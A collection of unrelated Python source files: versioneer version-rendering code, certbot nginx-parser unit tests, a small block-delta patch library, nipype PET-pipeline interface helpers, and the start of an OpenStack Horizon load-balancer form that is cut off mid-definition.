elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree"}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version"}
|
|
"""Test for certbot_nginx._internal.nginxparser."""
import copy
import operator
import tempfile
import unittest
from pyparsing import ParseException
from certbot_nginx._internal.nginxparser import dump
from certbot_nginx._internal.nginxparser import dumps
from certbot_nginx._internal.nginxparser import load
from certbot_nginx._internal.nginxparser import loads
from certbot_nginx._internal.nginxparser import RawNginxParser
from certbot_nginx._internal.nginxparser import UnspacedList
import test_util as util
FIRST = operator.itemgetter(0)
class TestRawNginxParser(unittest.TestCase):
"""Test the raw low-level Nginx config parser."""
def test_assignments(self):
parsed = RawNginxParser.assignment.parseString('root /test;').asList()
self.assertEqual(parsed, ['root', ' ', '/test'])
parsed = RawNginxParser.assignment.parseString('root /test;foo bar;').asList()
self.assertEqual(parsed, ['root', ' ', '/test'], ['foo', ' ', 'bar'])
def test_blocks(self):
parsed = RawNginxParser.block.parseString('foo {}').asList()
self.assertEqual(parsed, [['foo', ' '], []])
parsed = RawNginxParser.block.parseString('location /foo{}').asList()
self.assertEqual(parsed, [['location', ' ', '/foo'], []])
parsed = RawNginxParser.block.parseString('foo { bar foo ; }').asList()
self.assertEqual(parsed, [['foo', ' '], [[' ', 'bar', ' ', 'foo', ' '], ' ']])
def test_nested_blocks(self):
parsed = RawNginxParser.block.parseString('foo { bar {} }').asList()
block, content = parsed
self.assertEqual(FIRST(content), [[' ', 'bar', ' '], []])
self.assertEqual(FIRST(block), 'foo')
def test_dump_as_string(self):
dumped = dumps(UnspacedList([
['user', ' ', 'www-data'],
[['\n', 'server', ' '], [
['\n ', 'listen', ' ', '80'],
['\n ', 'server_name', ' ', 'foo.com'],
['\n ', 'root', ' ', '/home/ubuntu/sites/foo/'],
[['\n\n ', 'location', ' ', '/status', ' '], [
['\n ', 'check_status', ''],
[['\n\n ', 'types', ' '],
[['\n ', 'image/jpeg', ' ', 'jpg']]],
]]
]]]))
self.assertEqual(dumped.split('\n'),
'user www-data;\n'
'server {\n'
' listen 80;\n'
' server_name foo.com;\n'
' root /home/ubuntu/sites/foo/;\n'
'\n'
' location /status {\n'
' check_status;\n'
'\n'
' types {\n'
' image/jpeg jpg;}}}'.split('\n'))
def test_parse_from_file(self):
with open(util.get_data_filename('foo.conf')) as handle:
parsed = util.filter_comments(load(handle))
self.assertEqual(
parsed,
[['user', 'www-data'],
[['http'],
[[['server'], [
['listen', '*:80', 'default_server', 'ssl'],
['server_name', '*.www.foo.com', '*.www.example.com'],
['root', '/home/ubuntu/sites/foo/'],
[['location', '/status'], [
[['types'], [['image/jpeg', 'jpg']]],
]],
[['location', '~', r'case_sensitive\.php$'], [
['index', 'index.php'],
['root', '/var/root'],
]],
[['location', '~*', r'case_insensitive\.php$'], []],
[['location', '=', r'exact_match\.php$'], []],
[['location', '^~', r'ignore_regex\.php$'], []]
]]]]]
)
def test_parse_from_file2(self):
with open(util.get_data_filename('edge_cases.conf')) as handle:
parsed = util.filter_comments(load(handle))
self.assertEqual(
parsed,
[[['server'], [['server_name', 'simple']]],
[['server'],
[['server_name', 'with.if'],
[['location', '~', '^/services/.+$'],
[[['if', '($request_filename', '~*', '\\.(ttf|woff)$)'],
[['add_header', 'Access-Control-Allow-Origin', '"*"']]]]]]],
[['server'],
[['server_name', 'with.complicated.headers'],
[['location', '~*', '\\.(?:gif|jpe?g|png)$'],
[['add_header', 'Pragma', 'public'],
['add_header',
'Cache-Control', '\'public, must-revalidate, proxy-revalidate\'',
'"test,;{}"', 'foo'],
['blah', '"hello;world"'],
['try_files', '$uri', '@rewrites']]]]]])
def test_parse_from_file3(self):
with open(util.get_data_filename('multiline_quotes.conf')) as handle:
parsed = util.filter_comments(load(handle))
self.assertEqual(
parsed,
[[['http'],
[[['server'],
[['listen', '*:443'],
[['location', '/'],
[['body_filter_by_lua',
'\'ngx.ctx.buffered = (ngx.ctx.buffered or "")'
' .. string.sub(ngx.arg[1], 1, 1000)\n'
' '
'if ngx.arg[2] then\n'
' '
'ngx.var.resp_body = ngx.ctx.buffered\n'
' end\'']]]]]]]])
def test_abort_on_parse_failure(self):
with open(util.get_data_filename('broken.conf')) as handle:
self.assertRaises(ParseException, load, handle)
def test_dump_as_file(self):
with open(util.get_data_filename('nginx.conf')) as handle:
parsed = load(handle)
parsed[-1][-1].append(UnspacedList([['server'],
[['listen', ' ', '443', ' ', 'ssl'],
['server_name', ' ', 'localhost'],
['ssl_certificate', ' ', 'cert.pem'],
['ssl_certificate_key', ' ', 'cert.key'],
['ssl_session_cache', ' ', 'shared:SSL:1m'],
['ssl_session_timeout', ' ', '5m'],
['ssl_ciphers', ' ', 'HIGH:!aNULL:!MD5'],
[['location', ' ', '/'],
[['root', ' ', 'html'],
['index', ' ', 'index.html', ' ', 'index.htm']]]]]))
with tempfile.TemporaryFile(mode='w+t') as f:
dump(parsed, f)
f.seek(0)
parsed_new = load(f)
self.assertEqual(parsed, parsed_new)
def test_comments(self):
with open(util.get_data_filename('minimalistic_comments.conf')) as handle:
parsed = load(handle)
with tempfile.TemporaryFile(mode='w+t') as f:
dump(parsed, f)
f.seek(0)
parsed_new = load(f)
self.assertEqual(parsed, parsed_new)
self.assertEqual(parsed_new, [
['#', " Use bar.conf when it's a full moon!"],
['include', 'foo.conf'],
['#', ' Kilroy was here'],
['check_status'],
[['server'],
[['#', ''],
['#', " Don't forget to open up your firewall!"],
['#', ''],
['listen', '1234'],
['#', ' listen 80;']]],
])
def test_issue_518(self):
parsed = loads('if ($http_accept ~* "webp") { set $webp "true"; }')
self.assertEqual(parsed, [
[['if', '($http_accept', '~*', '"webp")'],
[['set', '$webp', '"true"']]]
])
def test_comment_in_block(self):
parsed = loads("""http {
# server{
}""")
self.assertEqual(parsed, [
[['http'],
[['#', ' server{']]]
])
def test_access_log(self):
# see issue #3798
parsed = loads('access_log syslog:server=unix:/dev/log,facility=auth,'
'tag=nginx_post,severity=info custom;')
self.assertEqual(parsed, [
['access_log',
'syslog:server=unix:/dev/log,facility=auth,tag=nginx_post,severity=info',
'custom']
])
def test_add_header(self):
# see issue #3798
parsed = loads('add_header Cache-Control no-cache,no-store,must-revalidate,max-age=0;')
self.assertEqual(parsed, [
['add_header', 'Cache-Control', 'no-cache,no-store,must-revalidate,max-age=0']
])
def test_map_then_assignment_in_block(self):
# see issue #3798
test_str = """http {
map $http_upgrade $connection_upgrade {
default upgrade;
'' close;
"~Opera Mini" 1;
*.example.com 1;
}
one;
}"""
parsed = loads(test_str)
self.assertEqual(parsed, [
[['http'], [
[['map', '$http_upgrade', '$connection_upgrade'], [
['default', 'upgrade'],
["''", 'close'],
['"~Opera Mini"', '1'],
['*.example.com', '1']
]],
['one']
]]
])
def test_variable_name(self):
parsed = loads('try_files /typo3temp/tx_ncstaticfilecache/'
'$host${request_uri}index.html @nocache;')
self.assertEqual(parsed, [
['try_files',
'/typo3temp/tx_ncstaticfilecache/$host${request_uri}index.html',
'@nocache']
])
def test_weird_blocks(self):
test = r"""
if ($http_user_agent ~ MSIE) {
rewrite ^(.*)$ /msie/$1 break;
}
if ($http_cookie ~* "id=([^;]+)(?:;|$)") {
set $id $1;
}
if ($request_method = POST) {
return 405;
}
if ($request_method) {
return 403;
}
if ($args ~ post=140){
rewrite ^ http://example.com/;
}
location ~ ^/users/(.+\.(?:gif|jpe?g|png))$ {
alias /data/w3/images/$1;
}
proxy_set_header X-Origin-URI ${scheme}://${http_host}/$request_uri;
"""
parsed = loads(test)
self.assertEqual(parsed, [[['if', '($http_user_agent', '~', 'MSIE)'],
[['rewrite', '^(.*)$', '/msie/$1', 'break']]],
[['if', '($http_cookie', '~*', '"id=([^;]+)(?:;|$)")'], [['set', '$id', '$1']]],
[['if', '($request_method', '=', 'POST)'], [['return', '405']]],
[['if', '($request_method)'],
[['return', '403']]], [['if', '($args', '~', 'post=140)'],
[['rewrite', '^', 'http://example.com/']]],
[['location', '~', '^/users/(.+\\.(?:gif|jpe?g|png))$'],
[['alias', '/data/w3/images/$1']]],
['proxy_set_header', 'X-Origin-URI', '${scheme}://${http_host}/$request_uri']]
)
def test_edge_cases(self):
# quotes
parsed = loads(r'"hello\""; # blah "heh heh"')
self.assertEqual(parsed, [['"hello\\""'], ['#', ' blah "heh heh"']])
# if with comment
parsed = loads("""if ($http_cookie ~* "id=([^;]+)(?:;|$)") { # blah )
}""")
self.assertEqual(parsed, [[['if', '($http_cookie', '~*', '"id=([^;]+)(?:;|$)")'],
[['#', ' blah )']]]])
# end paren
test = """
one"test";
("two");
"test")red;
"test")"blue";
"test")"three;
(one"test")one;
one";
one"test;
one"test"one;
"""
parsed = loads(test)
self.assertEqual(parsed, [
['one"test"'],
['("two")'],
['"test")red'],
['"test")"blue"'],
['"test")"three'],
['(one"test")one'],
['one"'],
['one"test'],
['one"test"one']
])
self.assertRaises(ParseException, loads, r'"test"one;') # fails
self.assertRaises(ParseException, loads, r'"test;') # fails
# newlines
test = """
server_name foo.example.com bar.example.com \
baz.example.com qux.example.com;
server_name foo.example.com bar.example.com
baz.example.com qux.example.com;
"""
parsed = loads(test)
self.assertEqual(parsed, [
['server_name', 'foo.example.com', 'bar.example.com',
'baz.example.com', 'qux.example.com'],
['server_name', 'foo.example.com', 'bar.example.com',
'baz.example.com', 'qux.example.com']
])
# variable weirdness
parsed = loads("directive $var ${var} $ ${};")
self.assertEqual(parsed, [['directive', '$var', '${var}', '$', '${}']])
self.assertRaises(ParseException, loads, "server {server_name test.com};")
self.assertEqual(loads("blag${dfgdfg};"), [['blag${dfgdfg}']])
self.assertRaises(ParseException, loads, "blag${dfgdf{g};")
# empty file
parsed = loads("")
self.assertEqual(parsed, [])
class TestUnspacedList(unittest.TestCase):
"""Test the UnspacedList data structure"""
def setUp(self):
self.a = ["\n ", "things", " ", "quirk"]
self.b = ["y", " "]
self.l = self.a[:]
self.l2 = self.b[:]
self.ul = UnspacedList(self.l)
self.ul2 = UnspacedList(self.l2)
def test_construction(self):
self.assertEqual(self.ul, ["things", "quirk"])
self.assertEqual(self.ul2, ["y"])
def test_append(self):
ul3 = copy.deepcopy(self.ul)
ul3.append("wise")
self.assertEqual(ul3, ["things", "quirk", "wise"])
self.assertEqual(ul3.spaced, self.a + ["wise"])
def test_add(self):
ul3 = self.ul + self.ul2
self.assertEqual(ul3, ["things", "quirk", "y"])
self.assertEqual(ul3.spaced, self.a + self.b)
self.assertEqual(self.ul.spaced, self.a)
ul3 = self.ul + self.l2
self.assertEqual(ul3, ["things", "quirk", "y"])
self.assertEqual(ul3.spaced, self.a + self.b)
def test_extend(self):
ul3 = copy.deepcopy(self.ul)
ul3.extend(self.ul2)
self.assertEqual(ul3, ["things", "quirk", "y"])
self.assertEqual(ul3.spaced, self.a + self.b)
self.assertEqual(self.ul.spaced, self.a)
def test_set(self):
ul3 = copy.deepcopy(self.ul)
ul3[0] = "zither"
l = ["\n ", "zather", "zest"]
ul3[1] = UnspacedList(l)
self.assertEqual(ul3, ["zither", ["zather", "zest"]])
self.assertEqual(ul3.spaced, [self.a[0], "zither", " ", l])
def test_get(self):
self.assertRaises(IndexError, self.ul2.__getitem__, 2)
self.assertRaises(IndexError, self.ul2.__getitem__, -3)
def test_insert(self):
x = UnspacedList(
[['\n ', 'listen', ' ', '69.50.225.155:9000'],
['\n ', 'listen', ' ', '127.0.0.1'],
['\n ', 'server_name', ' ', '.example.com'],
['\n ', 'server_name', ' ', 'example.*'], '\n',
['listen', ' ', '5001', ' ', 'ssl']])
x.insert(5, "FROGZ")
self.assertEqual(x,
[['listen', '69.50.225.155:9000'], ['listen', '127.0.0.1'],
['server_name', '.example.com'], ['server_name', 'example.*'],
['listen', '5001', 'ssl'], 'FROGZ'])
self.assertEqual(x.spaced,
[['\n ', 'listen', ' ', '69.50.225.155:9000'],
['\n ', 'listen', ' ', '127.0.0.1'],
['\n ', 'server_name', ' ', '.example.com'],
['\n ', 'server_name', ' ', 'example.*'], '\n',
['listen', ' ', '5001', ' ', 'ssl'],
'FROGZ'])
def test_rawlists(self):
ul3 = copy.deepcopy(self.ul)
ul3.insert(0, "some")
ul3.append("why")
ul3.extend(["did", "whether"])
del ul3[2]
self.assertEqual(ul3, ["some", "things", "why", "did", "whether"])
def test_is_dirty(self):
self.assertIs(self.ul2.is_dirty(), False)
ul3 = UnspacedList([])
ul3.append(self.ul)
self.assertIs(self.ul.is_dirty(), False)
self.assertIs(ul3.is_dirty(), True)
ul4 = UnspacedList([[1], [2, 3, 4]])
self.assertIs(ul4.is_dirty(), False)
ul4[1][2] = 5
self.assertIs(ul4.is_dirty(), True)
if __name__ == '__main__':
unittest.main() # pragma: no cover
|
|
#!/usr/bin/env python
from hashlib import sha256, md5
import struct
__VERSION = 2
def __signature(basis_file, block_size):
# Yield the identifier string, file type, version number and block size
s_block = ('bdif' + 'sig' +
struct.pack('i', __VERSION) +
struct.pack('i', block_size))
yield s_block
# Calculate the hash of each block and yield it.
for block in iter(lambda: basis_file.read(block_size), ''):
h = md5(block)
yield h.digest()
def signature(basis_file, sig_file = None, block_size = 4096):
"""Generate a signature from a basis file
Arguments:
basis_file: The original file that needs to be updated
sig_file: (Optional) File object to output the signature
block_size: (Optional) Number of bytes per block. Fixed at this value for
the rest of the process (delta and patch)
"""
if sig_file is None:
return __signature(basis_file, block_size)
else:
for block in __signature(basis_file, block_size):
sig_file.write(block)
def __delta(sig_file, new_file):
# Make sure we are at the beginning of both files.
sig_file.seek(0)
new_file.seek(0)
# Verify the file is for us
if not sig_file.read(7) == 'bdifsig':
raise Exception('Not a bdiff sig file')
# Get the version number
version_bytes = sig_file.read(4)
version = int(struct.unpack('i', version_bytes)[0])
if version == 2:
# Get block_size from sig_file
block_size_bytes = sig_file.read(4)
block_size = int(struct.unpack('i', block_size_bytes)[0])
# Write the identifier string, file type, version number and block size
d_block = 'bdif' + 'dlt' + struct.pack('i', __VERSION) + block_size_bytes
yield d_block
# Read the signatures into memory
signatures = {}
block_number = 0
for block in iter(lambda: sig_file.read(16), ''):
signatures[block] = block_number
block_number += 1
# Read the new_file calculating block hashes and comparing them to
# the list from sig_file. Also calculate a whole file hash for error
# checking.
file_h = sha256()
for block in iter(lambda: new_file.read(block_size), ''):
h = md5(block)
file_h.update(block)
block_hash = h.digest()
if block_hash in signatures:
# Found the block in the basis_file so write an instruction
# to copy that block from the basis_file
d_block = 'C' + struct.pack('i', signatures[block_hash])
yield d_block
elif len(block) == block_size:
# Block not found in basis_file so write an instruction
# to get the block from delta_file and include the block data
d_block = 'D' + block
yield d_block
else:
# Block not found and the block we got is shorter than block_size
# so write a different instruction that includes the block length
d_block = 'E' + struct.pack('i', len(block)) + block
yield d_block
# Write the complete file hash to the delta file
d_block = 'H' + file_h.digest()
yield d_block
else:
raise Exception("Unknown signature file version")
def delta(sig_file, new_file, delta_file = None):
"""Generate a patch file using a signature and new file
Arguments:
sig_file: File object for the signature file
new_file: The updated file we are trying to replicate
delta_file: (optional) File object to which the patch instruction will be
written. If omitted, a generator will be returned
"""
if delta_file is None:
return __delta(sig_file, new_file)
else:
for block in __delta(sig_file, new_file):
delta_file.write(block)
def __patch(basis_file, delta_file):
# Verify the file is for us
if not delta_file.read(7) == 'bdifdlt':
raise Exception('Not a bdiff delta file')
# Get the version number
version_bytes = delta_file.read(4)
version = int(struct.unpack('i', version_bytes)[0])
if version == 2:
# Get block size from delta_file
block_size = int(struct.unpack('i', delta_file.read(4))[0])
file_h = sha256()
file_h_target = ''
# Read the instructions from the delta_file
while True:
mode = delta_file.read(1)
if not mode:
break
if mode == 'C':
# Copy mode. Get the data from basis_file
block_number = int(struct.unpack('i', delta_file.read(4))[0])
basis_file.seek(block_number * block_size)
data = basis_file.read(block_size)
elif mode == 'D':
# Delta mode. Get the data from the delta file
data = delta_file.read(block_size)
elif mode == 'E':
# Delta mode but with a short block (EOF)
delta_bytes = int(struct.unpack('i', delta_file.read(4))[0])
data = delta_file.read(delta_bytes)
elif mode == 'H':
# Found the complete file hash. new_file should match this.
file_h_target = delta_file.read(32)
break
else:
raise Exception("Incorrectly formatted delta file")
file_h.update(data)
yield data
if not file_h.digest() == file_h_target:
raise Exception("Hash mismatch in new file")
else:
raise Exception("Unknown delta file version")
def patch(basis_file, delta_file, new_file = None):
"""Patch basis_file using the instructions in delta_file
Arguments:
basis_file: The original file from which the signature was created
delta_file: The file object containing the patch instructions
new_file: (Optional) The final patched file object
"""
if new_file is None:
return __patch(basis_file, delta_file)
else:
for block in __patch(basis_file, delta_file):
new_file.write(block)
# This library isn't really meant to be used from the command line except
# for some rudimentary testing. Thus, the below code has very little error
# checking or polish.
if __name__ == '__main__':
from sys import argv
if argv[1] == "sig":
# Command line params:
# basis_file sig_file
try:
with open(argv[2],'rb') as basis_file:
with open(argv[3],'wb') as sig_file:
signature(basis_file, sig_file)
except IOError:
print "signature problem"
elif argv[1] == "delta":
# Command line params:
# sig_file new_file delta
try:
with open(argv[2],'rb') as sig_file:
with open(argv[3],'rb') as new_file:
with open(argv[4],'wb') as delta_file:
delta(sig_file, new_file, delta_file)
except IOError:
print "delta problem"
elif argv[1] == "patch":
# Command line params:
# basis_file delta_file new_file
try:
with open(argv[2],'rb') as basis_file:
with open(argv[3],'rb') as delta_file:
with open(argv[4],'wb') as new_file:
patch(basis_file, delta_file, new_file)
except IOError:
print "patch problem"
else:
print "Must specific one of sig, delta or patch"
|
|
import os
import re
import gzip
import shutil
import gzip
import subprocess
import nibabel as nib
import ntpath
import pandas as pd
import numpy as np
import tempfile
import nibabel as nib
from nipype.interfaces.base import (TraitedSpec, File, traits, InputMultiPath, CommandLine, CommandLineInputSpec,
BaseInterface, OutputMultiPath, BaseInterfaceInputSpec, isdefined)
def nib_load_3d(fn):
img = nib.load(fn)
vol = img.get_data()
vol = vol.reshape(vol.shape[0:3])
img_3d = nib.Nifti1Image(vol, img.affine)
return img_3d
def cmd(command):
try:
output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True, universal_newlines=True)
except subprocess.CalledProcessError as exc:
print("Status : FAIL", exc.returncode, exc.output)
exit(1)
else:
print("Output: \n{}\n".format(output))
def splitext(s):
try :
ssplit = os.path.basename(s).split('.')
ext='.'+'.'.join(ssplit[1:])
basepath= re.sub(ext,'',s)
return [basepath, ext]
except TypeError :
return s
def gz(ii, oo):
with open(ii, 'rb') as in_file:
with gzip.open(oo, 'wb') as out_file:
shutil.copyfileobj(in_file, out_file)
def gunzip(ii, oo):
with gzip.open(ii, 'rb') as in_file:
with open(oo, 'wb') as out_file:
shutil.copyfileobj(in_file, out_file)
def check_gz(in_file_fn) :
img, ext = splitext(in_file_fn)
if '.gz' in ext :
out_file_fn = tempfile.mkdtemp() + os.path.basename(img) + '.nii'
sif = img + '.sif'
if os.path.exists(sif) :
shutil.copy(sif, '/tmp/'+os.path.basename(img)+'.sif' )
gunzip(in_file_fn, out_file_fn)
return out_file_fn
else :
return in_file_fn
class separate_mask_labelsOutput(TraitedSpec):
out_file=traits.File(argstr="%s", desc="4D label image")
class separate_mask_labelsInput(TraitedSpec):
in_file=traits.File(argstr="%s", desc="3D label image")
out_file=traits.File(argstr="%s", desc="4D label image")
class separate_mask_labelsCommand(BaseInterface ):
input_spec = separate_mask_labelsInput
output_spec = separate_mask_labelsOutput
def _run_interface(self, runtime):
vol = nib.load(self.inputs.in_file)
data = vol.get_data()
data = data.reshape(*data.shape[0:3])
if not isdefined(self.inputs.out_file) :
self.inputs.out_file = self._gen_outputs(self.inputs.in_file)
unique = np.unique( data ).astype(int)
nUnique = len(unique)-1
out = np.zeros( [data.shape[0], data.shape[1], data.shape[2], nUnique] )
print('unique', unique)
print('shape',out.shape)
print('data', data.shape)
for t,i in enumerate( unique ) :
if i != 0 :
print(t-1, i )
out[ data == i, t-1 ] = 1
out_file=nib.Nifti1Image(out, vol.get_affine(), vol.header)
out_file.to_filename(self.inputs.out_file)
return(runtime)
def _gen_outputs(self, fn) :
fn_split = splitext(fn)
return os.getcwd() + os.sep + os.path.basename( fn_split[0] ) + "_4d" + fn_split[1]
def _list_outputs(self):
outputs = self.output_spec().get()
if not isdefined(self.inputs.out_file) :
self.inputs.out_file = self._gen_outputs(self.inputs.in_file)
outputs["out_file"] = self.inputs.out_file
return outputs
class concat_dfOutput(TraitedSpec):
out_file = traits.File(desc="Output file")
class concat_dfInput(BaseInterfaceInputSpec):
in_list = traits.List(mandatory=True, exists=True, desc="Input list")
out_file = traits.File(mandatory=True, desc="Output file")
test = traits.Bool(default=False, usedefault=True, desc="Flag for if df is part of test run of pipeline")
class concat_df(BaseInterface):
input_spec = concat_dfInput
output_spec = concat_dfOutput
def _run_interface(self, runtime):
df=pd.DataFrame([])
test = self.inputs.test
for f in self.inputs.in_list:
dft = pd.read_csv(f)
df = pd.concat([df, dft], axis=0)
#if test : print df
df.to_csv(self.inputs.out_file, index=False)
return(runtime)
def _list_outputs(self):
outputs = self.output_spec().get()
outputs["out_file"] = os.getcwd() + os.sep + self.inputs.out_file
return outputs
class ConcatOutput(TraitedSpec):
out_file = File(exists=True, desc="resampled image")
class ConcatInput(CommandLineInputSpec):
in_file = InputMultiPath(File(mandatory=True), position=0, argstr='%s', desc='List of input images.')
out_file = File(position=1, argstr="%s", mandatory=True, desc="Output image.")
dimension = traits.Str(argstr="-concat_dimension %s", desc="Concatenate along a given dimension.")
start = traits.Float(argstr="-start %s", desc="Starting coordinate for new dimension.")
step = traits.Float(argstr="-step %s", desc="Step size for new dimension.")
clobber = traits.Bool(argstr="-clobber", usedefault=True, default_value=True, desc="Overwrite output file")
verbose = traits.Bool(argstr="-verbose", usedefault=True, default_value=True, desc="Write messages indicating progress")
class copyOutput(TraitedSpec):
output_file=traits.File(argstr="%s", desc="input")
class copyInput(TraitedSpec):
input_file=traits.File(argstr="%s", desc="input")
output_file=traits.File(argstr="%s", desc="output")
class copyCommand(BaseInterface ):
input_spec = copyInput
output_spec = copyOutput
def _run_interface(self, runtime):
if not isdefined(self.inputs.output_file) :
self.inputs.output_file = self._gen_output(self.inputs.input_file)
shutil.copy(self.inputs.input_file, self.inputs.output_file)
return(runtime)
def _gen_output(self, fn) :
return os.getcwd() + os.sep + os.path.basename( fn )
def _list_outputs(self):
outputs = self.output_spec().get()
if not isdefined(self.inputs.output_file) :
self.inputs.output_file = self._gen_output(self.inputs.input_file)
outputs["output_file"] = self.inputs.output_file
return outputs
#In theory, this information should be contained in the header.
# Often, however, the information will either not be present in the header or it will be saved under an unexpected variable name (e.g., "Patient_Weight", "body_weight", "weight" ).
# One way around this problem is to allow the user to create a .csv file with the subject
#name and the parameter of interest. This way, if the paramter cannot be read from the header, it can still be read from the text file.
class subject_parameterOutput(TraitedSpec):
parameter=traits.String(argstr="%s", desc="Subject parameter")
class subject_parameterInput(TraitedSpec):
parameter_name=traits.String(argstr="%s", desc="File containing subject parameters")
header = traits.Dict(desc="Python dictionary containing PET header")
parameter=traits.String(argstr="%s", desc="Subject parameter")
sid=traits.String(desc="Subject ID")
class subject_parameterCommand(BaseInterface ):
input_spec = subject_parameterInput
output_spec = subject_parameterOutput
def _run_interface(self, runtime):
parameter_name = self.inputs.parameter_name
header = self.inputs.header
sid = self.inputs.sid
if os.path.exists(parameter_name):
#Case 1: paramter_name is a file name containing the subjects and parameters
# --> attempt to extract parameter from header
df=pd.read_csv(parameter_name, header=None)
parameter=df.iloc[:, 1][ df.iloc[:,0] == sid ].values[0]
#Case 2: parameter_name is a string representing the name of the parameter
else:
parameter=_finditem(header, parameter_name)
if type(parameter) == list:
parameter=parameter[0]
#convert scientific notation number to floating point number, stored as string
try:
parameter=format(float(parameter), 'f')
except ValueError: pass
self.inputs.parameter=str(parameter)
return(runtime)
def _list_outputs(self):
outputs = self.output_spec().get()
outputs["parameter"] = self.inputs.parameter
return outputs
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013, Big Switch Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon.utils import fields
from horizon.utils import validators
from horizon import workflows
from openstack_dashboard import api
AVAILABLE_PROTOCOLS = ('HTTP', 'HTTPS', 'TCP')
AVAILABLE_METHODS = ('ROUND_ROBIN', 'LEAST_CONNECTIONS', 'SOURCE_IP')
class AddPoolAction(workflows.Action):
name = forms.CharField(max_length=80, label=_("Name"))
description = forms.CharField(
initial="", required=False,
max_length=80, label=_("Description"))
# provider is optional because some LBaaS implemetation does
# not support service-type extension.
provider = forms.ChoiceField(label=_("Provider"), required=False)
subnet_id = forms.ChoiceField(label=_("Subnet"))
protocol = forms.ChoiceField(label=_("Protocol"))
lb_method = forms.ChoiceField(label=_("Load Balancing Method"))
admin_state_up = forms.BooleanField(label=_("Admin State"),
initial=True, required=False)
def __init__(self, request, *args, **kwargs):
super(AddPoolAction, self).__init__(request, *args, **kwargs)
tenant_id = request.user.tenant_id
subnet_id_choices = [('', _("Select a Subnet"))]
try:
networks = api.neutron.network_list_for_tenant(request, tenant_id)
except Exception:
exceptions.handle(request,
_('Unable to retrieve networks list.'))
networks = []
for n in networks:
for s in n['subnets']:
subnet_id_choices.append((s.id, s.cidr))
self.fields['subnet_id'].choices = subnet_id_choices
protocol_choices = [('', _("Select a Protocol"))]
[protocol_choices.append((p, p)) for p in AVAILABLE_PROTOCOLS]
self.fields['protocol'].choices = protocol_choices
lb_method_choices = [('', _("Select a Method"))]
[lb_method_choices.append((m, m)) for m in AVAILABLE_METHODS]
self.fields['lb_method'].choices = lb_method_choices
# provider choice
try:
if api.neutron.is_extension_supported(request, 'service-type'):
provider_list = api.neutron.provider_list(request)
providers = [p for p in provider_list
if p['service_type'] == 'LOADBALANCER']
else:
providers = None
except Exception:
exceptions.handle(request,
_('Unable to retrieve providers list.'))
providers = []
if providers:
default_providers = [p for p in providers if p.get('default')]
if default_providers:
default_provider = default_providers[0]['name']
else:
default_provider = None
provider_choices = [(p['name'], p['name']) for p in providers
if p['name'] != default_provider]
if default_provider:
provider_choices.insert(
0, (default_provider,
_("%s (default)") % default_provider))
else:
if providers is None:
msg = _("Provider for Load Balancer is not supported")
else:
msg = _("No provider is available")
provider_choices = [('', msg)]
self.fields['provider'].widget.attrs['readonly'] = True
self.fields['provider'].choices = provider_choices
class Meta:
name = _("Add New Pool")
permissions = ('openstack.services.network',)
help_text = _("Create Pool for current project.\n\n"
"Assign a name and description for the pool. "
"Choose one subnet where all members of this "
"pool must be on. "
"Select the protocol and load balancing method "
"for this pool. "
"Admin State is UP (checked) by default.")
class AddPoolStep(workflows.Step):
action_class = AddPoolAction
contributes = ("name", "description", "subnet_id", "provider",
"protocol", "lb_method", "admin_state_up")
def contribute(self, data, context):
context = super(AddPoolStep, self).contribute(data, context)
if data:
return context
class AddPool(workflows.Workflow):
slug = "addpool"
name = _("Add Pool")
finalize_button_name = _("Add")
success_message = _('Added pool "%s".')
failure_message = _('Unable to add pool "%s".')
success_url = "horizon:project:loadbalancers:index"
default_steps = (AddPoolStep,)
def format_status_message(self, message):
name = self.context.get('name')
return message % name
def handle(self, request, context):
try:
api.lbaas.pool_create(request, **context)
return True
except Exception:
return False
class AddVipAction(workflows.Action):
name = forms.CharField(max_length=80, label=_("Name"))
description = forms.CharField(
initial="", required=False,
max_length=80, label=_("Description"))
floatip_address = forms.ChoiceField(
label=_("VIP Address from Floating IPs"),
widget=forms.Select(attrs={'disabled': 'disabled'}),
required=False)
other_address = fields.IPField(required=False,
initial="",
version=fields.IPv4,
mask=False)
protocol_port = forms.IntegerField(label=_("Protocol Port"), min_value=1,
help_text=_("Enter an integer value "
"between 1 and 65535."),
validators=[validators.validate_port_range])
protocol = forms.ChoiceField(label=_("Protocol"))
session_persistence = forms.ChoiceField(
required=False, initial={}, label=_("Session Persistence"),
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'persistence'
}))
cookie_name = forms.CharField(
initial="", required=False,
max_length=80, label=_("Cookie Name"),
help_text=_("Required for APP_COOKIE persistence;"
" Ignored otherwise."),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'persistence',
'data-persistence-app_cookie': 'APP_COOKIE',
}))
connection_limit = forms.IntegerField(
